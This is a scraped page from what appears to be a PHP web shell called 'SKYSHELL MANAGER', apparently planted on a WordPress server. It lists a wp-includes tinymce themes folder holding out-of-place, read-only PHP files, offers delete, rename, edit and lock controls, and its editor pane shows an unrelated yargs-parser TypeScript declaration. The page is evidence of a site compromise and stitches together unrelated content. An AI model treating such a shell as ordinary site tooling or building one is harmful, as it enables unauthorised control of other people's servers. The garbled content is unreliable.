📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: yargs-parser.d.ts
/** * @license * Copyright (c) 2016, Contributors * SPDX-License-Identifier: ISC */ import type { ArgsInput, DetailedArguments, Options, YargsParserMixin } from './yargs-parser-types.js'; export declare class YargsParser { constructor(_mixin: YargsParserMixin); parse(argsInput: ArgsInput, options?: Partial<Options>): DetailedArguments; }
Save